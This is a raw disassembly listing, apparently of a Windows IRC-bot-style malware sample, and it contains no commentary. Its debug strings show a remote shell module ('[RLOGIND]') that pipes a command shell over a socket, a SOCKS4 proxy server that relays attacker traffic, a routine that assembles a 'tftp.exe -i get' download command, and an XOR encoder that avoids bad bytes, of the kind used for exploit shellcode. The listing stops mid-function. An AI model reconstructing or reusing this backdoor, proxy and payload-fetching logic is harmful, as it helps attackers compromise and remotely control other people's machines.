mov [ebp+74h+var_C], ebx
loc_41082F: ; CODE XREF: sub_41073A+25�j
; sub_41073A+C0�j ...
push ebx
push 1
lea eax, [ebp+74h+arg_0+3]
push eax
push dword ptr [edi+0Ch]
call dword_43575C ; recv
test eax, eax
jg loc_410757
loc_410847: ; CODE XREF: sub_41073A+B9�j
; sub_41073A+D7�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_41073A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41084F proc near ; CODE XREF: sub_41094B+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_414E7D
mov esi, eax
cmp esi, edi
pop ecx
jnz short loc_410874
xor eax, eax
jmp loc_410947
; ---------------------------------------------------------------------------
loc_410874: ; CODE XREF: sub_41084F+1C�j
push ebx
push edi
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
lea ebx, [esi+4]
mov [ebx], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ds:dword_420114 ; CreatePipe
test eax, eax
mov edi, ds:dword_42003C
jnz short loc_4108B5
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_3 ; "[RLOGIND]: Failed to create shell stdou"...
jmp short loc_4108D6
; ---------------------------------------------------------------------------
loc_4108B5: ; CODE XREF: sub_41084F+56�j
push 0
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_4]
push eax
call ds:dword_420114 ; CreatePipe
test eax, eax
jnz short loc_4108DE
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_4 ; "[RLOGIND]: Failed to create shell stdin"...
loc_4108D6: ; CODE XREF: sub_41084F+64�j
call sub_401F73
pop ecx
jmp short loc_41090B
; ---------------------------------------------------------------------------
loc_4108DE: ; CODE XREF: sub_41084F+79�j
push [ebp+arg_0]
mov ebx, [ebp+var_8]
push [ebp+var_4]
call sub_4105D1
pop ecx
pop ecx
mov [esi+8], eax
push [ebp+var_4]
call edi ; CloseHandle
push [ebp+var_8]
call edi ; CloseHandle
cmp dword ptr [esi+8], 0
jnz short loc_410940
push offset aRlogindFaile_5 ; "[RLOGIND]: Failed to execute shell."
call sub_401EFF
loc_41090B: ; CODE XREF: sub_41084F+8D�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_410917
push [ebp+var_4]
call edi ; CloseHandle
loc_410917: ; CODE XREF: sub_41084F+C1�j
cmp [ebp+var_8], 0
jz short loc_410922
push [ebp+var_8]
call edi ; CloseHandle
loc_410922: ; CODE XREF: sub_41084F+CC�j
mov eax, [esi]
test eax, eax
jz short loc_41092B
push eax
call edi ; CloseHandle
loc_41092B: ; CODE XREF: sub_41084F+D7�j
mov eax, [esi+4]
test eax, eax
jz short loc_410935
push eax
call edi ; CloseHandle
loc_410935: ; CODE XREF: sub_41084F+E1�j
push esi
call sub_414A14
pop ecx
xor eax, eax
jmp short loc_410946
; ---------------------------------------------------------------------------
loc_410940: ; CODE XREF: sub_41084F+B0�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_410946: ; CODE XREF: sub_41084F+EF�j
pop ebx
loc_410947: ; CODE XREF: sub_41084F+20�j
pop edi
pop esi
leave
retn
sub_41084F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41094B proc near ; CODE XREF: sub_40F563+1BC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_41084F
imul edi, 234h
mov esi, eax
mov eax, dword_43668C[edi]
mov edi, ds:dword_42000C
xor ebx, ebx
pop ecx
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_41069D
push ebx
lea eax, [ebp+var_C]
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_4109BA
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_6 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_401F73
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
xor eax, eax
jmp loc_410A9A
; ---------------------------------------------------------------------------
loc_4109BA: ; CODE XREF: sub_41094B+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_41073A
push ebx
lea eax, [ebp+var_C]
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_4109FB
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_6 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_401F73
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_4200F0 ; TerminateThread
xor eax, eax
jmp loc_410A9B
; ---------------------------------------------------------------------------
loc_4109FB: ; CODE XREF: sub_41094B+86�j
mov eax, [esi+10h]
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
push 0FFFFFFFFh
mov [ebp+var_10], eax
push ebx
lea eax, [ebp+var_18]
push eax
push 3
call ds:dword_42012C ; WaitForMultipleObjects
sub eax, ebx
jz short loc_410A55
dec eax
jz short loc_410A4F
dec eax
jz short loc_410A3B
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindWaitfor ; "[RLOGIND]: WaitForMultipleObjects error"...
call sub_401F73
pop ecx
pop ecx
jmp short loc_410A6A
; ---------------------------------------------------------------------------
loc_410A3B: ; CODE XREF: sub_41094B+D9�j
mov edi, ds:dword_4200F0
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_410A6A
; ---------------------------------------------------------------------------
loc_410A4F: ; CODE XREF: sub_41094B+D6�j
push ebx
push dword ptr [esi+10h]
jmp short loc_410A59
; ---------------------------------------------------------------------------
loc_410A55: ; CODE XREF: sub_41094B+D3�j
push ebx
push dword ptr [esi+14h]
loc_410A59: ; CODE XREF: sub_41094B+108�j
call ds:dword_4200F0 ; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_4200E8 ; TerminateProcess
loc_410A6A: ; CODE XREF: sub_41094B+EE�j
; sub_41094B+102�j
push dword ptr [esi+10h]
mov edi, ds:dword_42003C
call edi ; CloseHandle
push dword ptr [esi+14h]
call edi ; CloseHandle
push dword ptr [esi+8]
call edi ; CloseHandle
push dword ptr [esi]
call edi ; CloseHandle
push dword ptr [esi+4]
call edi ; CloseHandle
push dword ptr [esi+0Ch]
call dword_4358F4 ; closesocket
push esi
call sub_414A14
xor eax, eax
inc eax
loc_410A9A: ; CODE XREF: sub_41094B+6A�j
pop ecx
loc_410A9B: ; CODE XREF: sub_41094B+AB�j
pop edi
pop esi
pop ebx
leave
retn
sub_41094B endp
; =============== S U B R O U T I N E =======================================
sub_410AA0 proc near ; CODE XREF: sub_410ACC+A�p
; sub_410CCF+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
lea edx, [eax+1]
loc_410AA7: ; CODE XREF: sub_410AA0+C�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_410AA7
sub eax, edx
push esi
mov esi, eax
mov eax, [esp+4+arg_4]
lea ecx, [eax+1]
loc_410ABA: ; CODE XREF: sub_410AA0+1F�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_410ABA
sub eax, ecx
lea eax, [esi+eax*2+0C1h]
pop esi
retn
sub_410AA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410ACC proc near ; CODE XREF: sub_410CE6+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_410AA0
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_410AE9
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_410AE9: ; CODE XREF: sub_410ACC+17�j
mov eax, [ebp+arg_8]
lea edx, [eax+1]
loc_410AEF: ; CODE XREF: sub_410ACC+28�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_410AEF
sub eax, edx
push ebx
mov edx, eax
mov eax, [ebp+arg_C]
push esi
push edi
mov [ebp+arg_4], edx
lea esi, [eax+1]
loc_410B06: ; CODE XREF: sub_410ACC+3F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_410B06
sub eax, esi
mov ebx, [ebp+arg_0]
lea ecx, [eax+edx+12h]
mov dword_42C41C, ecx
push 0FFFFFFEDh
lea ecx, [eax+1]
mov dword_42C43D, ecx
lea ecx, [eax+17h]
mov dword_42C435, ecx
pop ecx
sub ecx, eax
mov dword_42C44B, ecx
push 1Dh
pop ecx
mov edi, ebx
mov esi, offset dword_42C3B8
rep movsd
mov esi, [ebp+arg_8]
mov ecx, edx
shr ecx, 2
lea edi, [ebx+74h]
rep movsd
mov ecx, edx
mov edx, [ebp+arg_4]
and ecx, 3
rep movsb
add edx, 74h
lea edi, [edx+ebx]
mov esi, (offset aTftp_exeIGet+0Ch)
movsd
movsb
mov esi, [ebp+arg_C]
add edx, 5
lea edi, [edx+ebx]
mov ecx, eax
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
mov ebx, [ebp+arg_0]
and ecx, 3
rep movsb
add edx, eax
lea edi, [edx+ebx]
mov esi, (offset aTftp_exeIGet+11h)
movsd
movsd
movsd
movsd
mov esi, [ebp+arg_C]
add edx, 10h
mov ecx, eax
lea edi, [edx+ebx]
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
push 0Eh
lea edi, [edx+eax]
add edi, [ebp+arg_0]
mov eax, [ebp+var_4]
pop ecx
mov esi, offset byte_42C441
rep movsd
pop edi
pop esi
pop ebx
leave
retn
sub_410ACC endp
; =============== S U B R O U T I N E =======================================
sub_410BC4 proc near ; CODE XREF: sub_410BDF+41�p
; sub_410CCF+E�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_410BCD
inc ecx
loc_410BCD: ; CODE XREF: sub_410BC4+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_410BC4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410BDF proc near ; CODE XREF: sub_410CE6+56�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_C]
cmp bl, 0Ah
push esi
jz short loc_410BFA
cmp bl, 0Dh
jz short loc_410BFA
cmp bl, 5Ch
jz short loc_410BFA
test bl, bl
jnz short loc_410BFB
loc_410BFA: ; CODE XREF: sub_410BDF+B�j
; sub_410BDF+10�j ...
inc ebx
loc_410BFB: ; CODE XREF: sub_410BDF+19�j
mov esi, 0FFh
cmp ebx, esi
jbe short loc_410C1F
mov eax, ebx
shr eax, 8
cmp al, 0Ah
jz short loc_410C19
cmp al, 0Dh
jz short loc_410C19
cmp al, 5Ch
jz short loc_410C19
test al, al
jnz short loc_410C1F
loc_410C19: ; CODE XREF: sub_410BDF+2C�j
; sub_410BDF+30�j ...
add ebx, 100h
loc_410C1F: ; CODE XREF: sub_410BDF+23�j
; sub_410BDF+38�j
push ebx
call sub_410BC4
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+arg_C], eax
ja short loc_410C35
cmp eax, 0FFFFh
jbe short loc_410C3C
loc_410C35: ; CODE XREF: sub_410BDF+4D�j
xor eax, eax
jmp loc_410CCB
; ---------------------------------------------------------------------------
loc_410C3C: ; CODE XREF: sub_410BDF+54�j
mov dl, byte_47C160
xor eax, eax
test ebx, ebx
jbe short loc_410C6A
loc_410C48: ; CODE XREF: sub_410BDF+89�j
mov ecx, [ebp+arg_8]
mov cl, [eax+ecx]
xor cl, dl
jz short loc_410C61
cmp cl, 0Ah
jz short loc_410C61
cmp cl, 0Dh
jz short loc_410C61
cmp cl, 5Ch
jnz short loc_410C65
loc_410C61: ; CODE XREF: sub_410BDF+71�j
; sub_410BDF+76�j ...
inc dl
xor eax, eax
loc_410C65: ; CODE XREF: sub_410BDF+80�j
inc eax
cmp eax, ebx
jb short loc_410C48
loc_410C6A: ; CODE XREF: sub_410BDF+67�j
cmp ebx, esi
push edi
mov edi, [ebp+arg_0]
push 5
mov byte_47C160, dl
pop ecx
ja short loc_410C92
mov esi, offset loc_42C3A0
mov byte_42C3AD, bl
mov byte_42C3B1, dl
rep movsd
push 15h
jmp short loc_410CAA
; ---------------------------------------------------------------------------
loc_410C92: ; CODE XREF: sub_410BDF+9A�j
mov word_42C396, bx
mov byte_42C39B, dl
mov esi, offset loc_42C388
rep movsd
movsw
push 17h
loc_410CAA: ; CODE XREF: sub_410BDF+B1�j
pop eax
xor ecx, ecx
test ebx, ebx
movsb
pop edi
jbe short loc_410CC8
mov esi, [ebp+arg_0]
add esi, eax
loc_410CB8: ; CODE XREF: sub_410BDF+E7�j
mov eax, [ebp+arg_8]
mov al, [ecx+eax]
xor al, dl
mov [esi+ecx], al
inc ecx
cmp ecx, ebx
jb short loc_410CB8
loc_410CC8: ; CODE XREF: sub_410BDF+D2�j
mov eax, [ebp+arg_C]
loc_410CCB: ; CODE XREF: sub_410BDF+58�j
pop esi
pop ebx
pop ebp
retn
sub_410BDF endp
; =============== S U B R O U T I N E =======================================
sub_410CCF proc near ; CODE XREF: sub_410CE6+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_410AA0
push eax
call sub_410BC4
add esp, 0Ch
retn
sub_410CCF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410CE6 proc near ; CODE XREF: sub_4127BC+6D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push edi
mov edi, [ebp+arg_C]
push edi
push ebx
call sub_410CCF
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_410D06
cmp eax, 0FFFFh
jbe short loc_410D0A
loc_410D06: ; CODE XREF: sub_410CE6+17�j
xor eax, eax
jmp short loc_410D4F
; ---------------------------------------------------------------------------
loc_410D0A: ; CODE XREF: sub_410CE6+1E�j
push esi
push edi
push ebx
call sub_410AA0
add eax, 101h
push eax
call sub_414E7D
add esp, 0Ch
push edi
push ebx
push edi
push ebx
mov esi, eax
call sub_410AA0
pop ecx
pop ecx
push eax
push esi
call sub_410ACC
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410BDF
push esi
mov edi, eax
call sub_414A14
add esp, 24h
mov eax, edi
pop esi
loc_410D4F: ; CODE XREF: sub_410CE6+22�j
pop edi
pop ebx
pop ebp
retn
sub_410CE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410D53 proc near ; CODE XREF: sub_410E50+200�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
push esi
push edi
xor ebx, ebx
mov esi, 400h
loc_410D66: ; CODE XREF: sub_410D53+C0�j
; sub_410D53+F2�j
mov eax, [ebp+arg_4]
xor ecx, ecx
inc ecx
mov [ebp+var_100], eax
mov [ebp+var_104], ecx
xor eax, eax
loc_410D7A: ; CODE XREF: sub_410D53+36�j
mov edx, [ebp+arg_0]
cmp [ebp+eax*4+var_100], edx
jz short loc_410D8B
inc eax
cmp eax, ecx
jb short loc_410D7A
loc_410D8B: ; CODE XREF: sub_410D53+31�j
cmp eax, ecx
jnz short loc_410D9F
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_410D9F: ; CODE XREF: sub_410D53+3A�j
push ebx
xor eax, eax
push ebx
mov ecx, 100h
lea edi, [ebp+var_504]
rep stosd
push ebx
lea eax, [ebp+var_104]
push eax
push ebx
call dword_43588C ; select
lea eax, [ebp+var_104]
push eax
push [ebp+arg_4]
call dword_43583C ; __WSAFDIsSet
test eax, eax
jz short loc_410E01
push ebx
push esi
lea eax, [ebp+var_504]
push eax
push [ebp+arg_4]
call dword_43575C ; recv
cmp eax, 0FFFFFFFFh
jz short loc_410E4B
push ebx
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz short loc_410E4B
loc_410E01: ; CODE XREF: sub_410D53+7E�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_43583C ; __WSAFDIsSet
test eax, eax
jz loc_410D66
push ebx
push esi
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_43575C ; recv
cmp eax, 0FFFFFFFFh
jz short loc_410E4B
push ebx
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_4]
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jnz loc_410D66
loc_410E4B: ; CODE XREF: sub_410D53+95�j
; sub_410D53+AC�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_410D53 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_410E50 proc near ; DATA XREF: sub_411080+13F�o
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_4D4 = byte ptr -4D4h
var_4D3 = byte ptr -4D3h
var_4D2 = word ptr -4D2h
var_4D0 = dword ptr -4D0h
var_4CC = byte ptr -4CCh
var_CC = byte ptr -0CCh
var_48 = byte ptr -48h
var_30 = dword ptr -30h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 5D8h
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 2Ch
pop ecx
mov esi, edx
lea edi, [ebp+74h+var_CC]
rep movsd
mov edi, [ebp+74h+var_30]
xor eax, eax
inc eax
mov [edx+0ACh], eax
mov esi, edi
mov [ebp+74h+var_5D8], eax
imul esi, 234h
mov ecx, dword_43668C[esi]
xor ebx, ebx
lea eax, [ebp+74h+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_5D8]
push eax
push ebx
mov [ebp+74h+arg_0], edi
mov [ebp+74h+var_C], 5
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_5D4], ecx
call dword_43588C ; select
test eax, eax
jnz short loc_410EC3
push dword_43668C[esi]
jmp loc_41106B
; ---------------------------------------------------------------------------
loc_410EC3: ; CODE XREF: sub_410E50+66�j
push ebx
push 408h
lea eax, [ebp+74h+var_4D4]
push eax
push dword_43668C[esi]
call dword_43575C ; recv
test eax, eax
jle loc_411065
cmp [ebp+74h+var_4D4], 4
jnz loc_411065
cmp [ebp+74h+var_4D3], 1
jnz loc_411065
cmp [ebp+74h+var_48], bl
jz loc_410F99
lea eax, [ebp+74h+var_48]
lea edi, [ebp+74h+var_4CC]
loc_410F10: ; CODE XREF: sub_410E50+DC�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_410F32
cmp cl, bl
jz short loc_410F2E
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_410F32
inc edi
inc edi
inc eax
inc eax
cmp cl, bl
jnz short loc_410F10
loc_410F2E: ; CODE XREF: sub_410E50+CA�j
xor eax, eax
jmp short loc_410F37
; ---------------------------------------------------------------------------
loc_410F32: ; CODE XREF: sub_410E50+C6�j
; sub_410E50+D4�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_410F37: ; CODE XREF: sub_410E50+E0�j
cmp eax, ebx
jz short loc_410F99
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+var_4CC]
push eax
push offset aSocks4Authenti ; "[SOCKS4]: Authentication failed. Remote"...
call sub_401F73
add esp, 0Ch
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Dh
loc_410F60: ; CODE XREF: sub_410E50+1C0�j
xor eax, eax
push ebx
mov ecx, 100h
lea edi, [ebp+74h+var_4CC]
rep stosd
push 8
lea eax, [ebp+74h+var_4D4]
push eax
push dword_43668C[esi]
call dword_43587C ; send
loc_410F85: ; CODE XREF: sub_410E50+210�j
push dword_43668C[esi]
call dword_4358F4 ; closesocket
push [ebp+74h+arg_0]
jmp loc_411072
; ---------------------------------------------------------------------------
loc_410F99: ; CODE XREF: sub_410E50+B1�j
; sub_410E50+E9�j
xor eax, eax
lea edi, [ebp+74h+var_1C]
stosd
stosd
stosd
stosd
mov ax, [ebp+74h+var_4D2]
push 6
mov [ebp+74h+var_1A], ax
mov eax, [ebp+74h+var_4D0]
push 1
push 2
mov [ebp+74h+var_1C], 2
mov [ebp+74h+var_18], eax
call dword_4357E8 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jnz short loc_410FDE
call dword_4358A0 ; WSAGetLastError
push eax
push offset aSocks4ErrorFai ; "[SOCKS4]: Error: Failed to open socket("...
jmp short loc_410FFC
; ---------------------------------------------------------------------------
loc_410FDE: ; CODE XREF: sub_410E50+17E�j
push 10h
lea ecx, [ebp+74h+var_1C]
push ecx
push eax
call dword_4357A0 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_411015
call dword_4358A0 ; WSAGetLastError
push eax
push offset aSocks4ErrorF_0 ; "[SOCKS4]: Error: Failed to connect to t"...
loc_410FFC: ; CODE XREF: sub_410E50+18C�j
call sub_401F73
pop ecx
pop ecx
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Bh
jmp loc_410F60
; ---------------------------------------------------------------------------
loc_411015: ; CODE XREF: sub_410E50+19E�j
xor eax, eax
push ebx
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Ah
mov ecx, 100h
lea edi, [ebp+74h+var_4CC]
rep stosd
push 8
lea eax, [ebp+74h+var_4D4]
push eax
push dword_43668C[esi]
call dword_43587C ; send
push dword_43668C[esi]
push [ebp+74h+var_4]
call sub_410D53
pop ecx
pop ecx
push [ebp+74h+var_4]
call dword_4358F4 ; closesocket
jmp loc_410F85
; ---------------------------------------------------------------------------
loc_411065: ; CODE XREF: sub_410E50+8E�j
; sub_410E50+9B�j ...
push dword_43668C[esi]
loc_41106B: ; CODE XREF: sub_410E50+6E�j
call dword_4358F4 ; closesocket
push edi
loc_411072: ; CODE XREF: sub_410E50+144�j
call sub_412735
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_410E50 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_411080 proc near ; DATA XREF: sub_408A18+4DCD�o
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 2D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
push 2Ch
pop ecx
xor ebx, ebx
lea edi, [ebp+74h+var_D4]
rep movsd
push [ebp+74h+var_40]
inc ebx
mov [eax+0A8h], ebx
xor eax, eax
lea edi, [ebp+74h+var_14]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_4], 10h
mov [ebp+74h+var_14], 2
call dword_435934 ; ntohs
push 6
push ebx
xor esi, esi
push 2
mov [ebp+74h+var_12], ax
mov [ebp+74h+var_10], esi
call dword_4357E8 ; socket
mov edi, eax
mov eax, [ebp+74h+var_3C]
imul eax, 234h
mov dword_43668C[eax], edi
push 10h
lea eax, [ebp+74h+var_14]
push eax
push edi
call dword_4358C0 ; bind
test eax, eax
jnz loc_411211
push 0Ah
push edi
call dword_435908 ; listen
test eax, eax
jnz loc_411211
push [ebp+74h+var_40]
push [ebp+74h+var_D4]
call sub_407D51
pop ecx
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_4145E5
add esp, 10h
cmp [ebp+74h+var_30], esi
jnz short loc_41114E
push esi
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_2D4]
push eax
lea eax, [ebp+74h+var_D0]
push eax
push [ebp+74h+var_D4]
call sub_4056FB
add esp, 14h
loc_41114E: ; CODE XREF: sub_411080+B2�j
; sub_411080+17A�j ...
lea eax, [ebp+74h+var_2D4]
push eax
call sub_401EFF
pop ecx
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_24]
push eax
push edi
call dword_4357AC ; accept
push [ebp+74h+var_3C]
mov ebx, eax
movzx eax, [ebp+74h+var_22]
push eax
push [ebp+74h+var_20]
mov [ebp+74h+var_28], esi
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4ClientCo ; "[SOCKS4]: Client connection from IP: %s"...
push eax
call sub_4145E5
push ebx
lea eax, [ebp+74h+var_2D4]
push 12h
push eax
call sub_412471
mov ecx, [ebp+74h+var_3C]
mov [ebp+74h+var_38], eax
imul eax, 234h
add esp, 20h
mov dword_436684[eax], ecx
lea eax, [ebp+74h+arg_0]
push eax
push esi
lea eax, [ebp+74h+var_D4]
push eax
push offset sub_410E50
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+74h+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_411207
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4Failed_0 ; "[SOCKS4]: Failed to start client thread"...
push eax
call sub_4145E5
add esp, 0Ch
jmp loc_41114E
; ---------------------------------------------------------------------------
loc_4111FF: ; CODE XREF: sub_411080+18A�j
push 5
call ds:dword_420000 ; Sleep
loc_411207: ; CODE XREF: sub_411080+15D�j
cmp [ebp+74h+var_28], esi
jz short loc_4111FF
jmp loc_41114E
; ---------------------------------------------------------------------------
loc_411211: ; CODE XREF: sub_411080+77�j
; sub_411080+88�j
push edi
call dword_4358F4 ; closesocket
push [ebp+74h+var_40]
lea eax, [ebp+74h+var_2D4]
push offset aSocks4Failed_1 ; "[SOCKS4]: Failed to start server on Por"...
push eax
call sub_4145E5
add esp, 0Ch
cmp [ebp+74h+var_30], esi
jnz short loc_41124E
push esi
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_2D4]
push eax
lea eax, [ebp+74h+var_D0]
push eax
push [ebp+74h+var_D4]
call sub_4056FB
add esp, 14h
loc_41124E: ; CODE XREF: sub_411080+1B2�j
lea eax, [ebp+74h+var_2D4]
push eax
call sub_401EFF
push [ebp+74h+var_3C]
call sub_412735
pop ecx
pop ecx
push esi
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_411080 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=68h
sub_41126C proc near ; CODE XREF: sub_4114E8+3C�p
var_288 = byte ptr -288h
var_F8 = byte ptr -0F8h
var_B8 = byte ptr -0B8h
var_B7 = byte ptr -0B7h
var_A4 = byte ptr -0A4h
var_98 = byte ptr -98h
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = byte ptr -74h
var_73 = byte ptr -73h
var_72 = word ptr -72h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = word ptr -54h
var_52 = word ptr -52h
var_50 = dword ptr -50h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-68h]
sub esp, 288h
and [ebp+68h+var_B8], 0
push edi
push 0Eh
pop ecx
xor eax, eax
lea edi, [ebp+68h+var_B7]
